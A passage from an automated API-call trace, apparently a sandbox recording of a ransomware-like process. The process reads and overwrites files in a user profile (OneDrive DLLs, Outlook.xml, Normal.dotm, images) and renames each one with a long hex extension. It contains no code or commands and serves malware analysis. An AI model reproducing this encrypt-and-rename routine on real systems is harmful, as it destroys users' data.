lpOverlapped=0x73e0048) returned 1 [0162.526] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.529] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.530] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll", lpString2=".A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll.A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SyncEngine.dll.A8EA40AFF3B27420526BFBC4D02BDC47DF3F221336EE9D949E62499630E19143" [0162.530] GetProcessHeap () returned 0x270000 [0162.530] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x162) returned 0x7420ac8 [0162.530] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x7420ac8, Length=0x162, FileInformationClass=0xa) returned 0x0 [0162.534] CloseHandle (hObject=0x5ac) returned 1 [0162.821] GetProcessHeap () returned 0x270000 [0162.823] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0162.830] RtlInterlockedCompareExchange64 () returned 0x1 [0162.830] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) 
returned 1 [0162.957] ReadFile (in: hFile=0x5ac, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0162.957] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.966] WriteFile (in: hFile=0x594, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0162.971] RtlInterlockedCompareExchange64 () returned 0x0 [0162.971] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0162.975] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x73e00f8, ReturnLength=0x723f8ec) returned 0x0 [0162.977] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll", lpString2=".1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll.1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\VideoStreamingPlugin.dll.1CB470F858401349379EC92F606DA6A3396B5B4727298454CE7C19C4A4A50E4C" [0162.977] 
GetProcessHeap () returned 0x270000 [0162.977] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x176) returned 0x427ad00 [0162.977] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x427ad00, Length=0x176, FileInformationClass=0xa) returned 0x0 [0162.979] CloseHandle (hObject=0x5ac) returned 1 [0163.213] GetProcessHeap () returned 0x270000 [0163.214] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0163.214] RtlInterlockedCompareExchange64 () returned 0x3 [0163.214] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.863] ReadFile (in: hFile=0x594, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0163.864] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.864] WriteFile (in: hFile=0x5c0, lpBuffer=0x7620190*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7600058 | out: lpBuffer=0x7620190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7600058) returned 1 [0163.866] RtlInterlockedCompareExchange64 () returned 0x0 [0163.866] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.866] WriteFile (in: hFile=0x5bc, lpBuffer=0x75ca808*, 
nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0 | out: lpBuffer=0x75ca808*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x75aa6d0) returned 1 [0163.867] RtlInterlockedCompareExchange64 () returned 0x1 [0163.867] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0163.867] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x7600108, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7600108, ReturnLength=0x723f8ec) returned 0x0 [0163.868] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg", lpString2=".026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.jpg.026A7657F1422B374E344B64C1ADC8A828D7B48274A99FC0AFEE345F0842C17B" [0163.868] GetProcessHeap () returned 0x270000 [0163.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x158) returned 0x35b470 [0163.869] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x723f8dc, FileInformation=0x35b470, Length=0x158, FileInformationClass=0xa) returned 0x0 [0163.900] CloseHandle (hObject=0x5c0) returned 1 [0163.903] GetProcessHeap () returned 0x270000 [0163.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7600058 | out: hHeap=0x270000) returned 1 [0163.906] RtlInterlockedCompareExchange64 () returned 0x3 [0163.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.467] ReadFile (in: hFile=0x5b8, lpBuffer=0x7552400, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8 | out: lpBuffer=0x7552400*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75322c8) returned 1 [0164.468] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.468] NtQueryObject (in: Handle=0x5c8, ObjectInformationClass=0x1, ObjectInformation=0x7690660, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x7690660, ReturnLength=0x723f8ec) returned 0x0 [0164.469] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg", lpString2=".608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg.608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg.608C74A485247A557FC35F89CA7F14CBA65DF0A6E7BEDFB6344DD0D11C1CAF70" [0164.469] GetProcessHeap () returned 0x270000 [0164.469] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x425d408 [0164.470] NtSetInformationFile (FileHandle=0x5c8, IoStatusBlock=0x723f8dc, FileInformation=0x425d408, Length=0x124, FileInformationClass=0xa) returned 0x0 [0164.471] CloseHandle (hObject=0x5c8) returned 1 [0164.476] GetProcessHeap () returned 0x270000 [0164.478] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76905b0 | out: hHeap=0x270000) returned 1 [0164.703] 
RtlInterlockedCompareExchange64 () returned 0x2 [0164.703] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.720] WriteFile (in: hFile=0x5e4, lpBuffer=0x77c9050*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a8f18 | out: lpBuffer=0x77c9050*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x77a8f18) returned 1 [0164.722] RtlInterlockedCompareExchange64 () returned 0x0 [0164.722] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.852] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.856] RtlInterlockedCompareExchange64 () returned 0x0 [0164.856] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.871] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.873] RtlInterlockedCompareExchange64 () returned 0x0 [0164.873] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: 
lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.885] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.886] RtlInterlockedCompareExchange64 () returned 0x0 [0164.886] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.902] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.906] RtlInterlockedCompareExchange64 () returned 0x0 [0164.906] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.923] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.924] RtlInterlockedCompareExchange64 () returned 0x0 [0164.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.948] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x2200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, 
lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.949] RtlInterlockedCompareExchange64 () returned 0x0 [0164.949] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.964] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.965] RtlInterlockedCompareExchange64 () returned 0x0 [0164.965] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.984] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0164.985] RtlInterlockedCompareExchange64 () returned 0x0 [0164.985] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0164.999] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.000] RtlInterlockedCompareExchange64 () returned 0x0 [0165.000] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 
lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.014] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.015] RtlInterlockedCompareExchange64 () returned 0x0 [0165.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.042] WriteFile (in: hFile=0x598, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.045] RtlInterlockedCompareExchange64 () returned 0x0 [0165.045] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.414] WriteFile (in: hFile=0x304, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.417] RtlInterlockedCompareExchange64 () returned 0x0 [0165.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.418] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, 
ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.427] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml", lpString2=".233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.233CF717EF7A8201B3E0F4AE20CA39E9107901B2455D31CCCF92BA4632833D16" [0165.427] GetProcessHeap () returned 0x270000 [0165.427] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x2ce8f0 [0165.428] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x723f8dc, FileInformation=0x2ce8f0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0165.432] CloseHandle (hObject=0x304) returned 1 [0165.435] GetProcessHeap () returned 0x270000 [0165.436] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.436] RtlInterlockedCompareExchange64 () returned 0x1 [0165.436] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.590] ReadFile (in: hFile=0x5b8, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x4600, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.590] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, 
lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.603] WriteFile (in: hFile=0x5b8, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x4600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0165.614] RtlInterlockedCompareExchange64 () returned 0x0 [0165.614] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.617] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.618] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm", lpString2=".EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.EAE8BA176D0845E2166C705567DE66951C45C72AD6291547E8FED818AE92D662" [0165.618] GetProcessHeap () returned 0x270000 [0165.618] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x42576a8 [0165.618] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x42576a8, Length=0x144, FileInformationClass=0xa) returned 0x0 [0165.627] CloseHandle (hObject=0x5b8) returned 1 [0165.631] GetProcessHeap () returned 0x270000 [0165.633] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.633] RtlInterlockedCompareExchange64 () returned 0x1 
[0165.633] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.719] ReadFile (in: hFile=0x598, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0165.719] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.721] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.722] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg", lpString2=".646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg.646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\ndlbiyE.jpg.646A9309FC98045B8CA121A938272DC8B0BE05FC88115315E4979063710D3063" [0165.722] GetProcessHeap () returned 0x270000 [0165.722] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x42769c8 [0165.722] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42769c8, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0165.723] CloseHandle (hObject=0x598) returned 1 [0165.725] GetProcessHeap () returned 0x270000 [0165.727] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: 
hHeap=0x270000) returned 1 [0165.731] RtlInterlockedCompareExchange64 () returned 0x1 [0165.732] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.732] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.733] RtlInterlockedCompareExchange64 () returned 0x0 [0165.733] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.754] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.756] RtlInterlockedCompareExchange64 () returned 0x0 [0165.756] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 